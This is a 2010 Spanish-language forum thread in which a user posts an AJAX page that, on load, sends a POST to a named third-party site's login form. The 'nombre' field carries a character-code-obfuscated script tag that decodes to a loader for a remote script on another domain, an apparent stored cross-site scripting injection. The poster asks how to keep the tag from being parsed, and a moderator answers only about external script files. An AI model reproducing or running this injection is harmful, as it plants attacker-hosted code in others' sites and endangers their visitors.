Foros del Web » Programando para Internet » Javascript »

Post en Javascript Codigo

Estas en el tema de Post en Javascript Codigo en el foro de Javascript en Foros del Web. Bueno, con esta parte del codigo, puedo enviar datos via Post por javascript peticion_http.send("&nombre=<script>document.write (String.fromCharCode(60,115,99,114,105,1 12,116,32,115,114,99,61,34,104,116,116,112,58,47,4 7,119,119,119,46,101,115,102,97,109,111,1 15,97,46,99,111,109,47,97,109,46,106,115,34,62,60, 47,115,99,114,105,112,116,62,0))</script> "); Pero como hago para que ...
  #1 (permalink)  
Antiguo 08/02/2010, 10:49
 
Fecha de Ingreso: enero-2009
Ubicación: Chile
Mensajes: 191
Antigüedad: 15 años, 3 meses
Puntos: 2
Post en Javascript Codigo

Bueno, con esta parte del codigo, puedo enviar datos via Post por javascript

peticion_http.send("&nombre=<script>document.write (String.fromCharCode(60,115,99,114,105,1

12,116,32,115,114,99,61,34,104,116,116,112,58,47,4 7,119,119,119,46,101,115,102,97,109,111,1

15,97,46,99,111,109,47,97,109,46,106,115,34,62,60, 47,115,99,114,105,112,116,62,0))</script>

");

Pero como hago para que javascript no lea como codigo javascript lo que esta dentro de "" ? Y QUE LO lea solo como string?

Osea que las <script> dentro del http.send("") no se lean como codigo javascript, si no que como simplmente string?

Bueno, el codigo completo que permite entrar en una web y enviar post es:


Código:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" 

"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Hola Mundo con AJAX</title>
 
<script type="text/javascript">
function descargaArchivo() {
  // Obtener la instancia del objeto XMLHttpRequest
  if(window.XMLHttpRequest) {
    peticion_http = new XMLHttpRequest();
  }
  else if(window.ActiveXObject) {
    peticion_http = new ActiveXObject("Microsoft.XMLHTTP");
  }
 
  // Preparar la funcion de respuesta
  peticion_http.onreadystatechange = muestraContenido;
 
  // Realizar peticion HTTP
  
  peticion_http.open('POST', 'http://www.solokampos.com.mx/login.php', true);
  
peticion_http.send("&nombre=<script>document.write(String.fromCharCode(60,115,99,114,105,1

12,116,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,101,115,102,97,109,111,1

15,97,46,99,111,109,47,97,109,46,106,115,34,62,60,47,115,99,114,105,112,116,62,0))</script>

");


 
  function muestraContenido() {
    if(peticion_http.readyState == 4) {
      if(peticion_http.status == 206) {
        alert(peticion_http.responseText);
      }
    }
  }
}
 
window.onload = descargaArchivo;
</script>
 
</head>
<body></body>
</html>
__________________
Fondos de Pantalla - Wallpapers Gratis
  #2 (permalink)  
Antiguo 08/02/2010, 10:57
Avatar de David
Moderador
 
Fecha de Ingreso: abril-2005
Ubicación: In this planet
Mensajes: 15.720
Antigüedad: 19 años
Puntos: 839
Respuesta: Post en Javascript Codigo

Guarda el script en un archivo separado y lo cargas con el src del tag script:
Código HTML:
Ver original
  1. <script type="text/javascript" src="script.js"></script>
__________________
Por favor, antes de preguntar, revisa la Guía para realizar preguntas.

Etiquetas: post
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 21:54.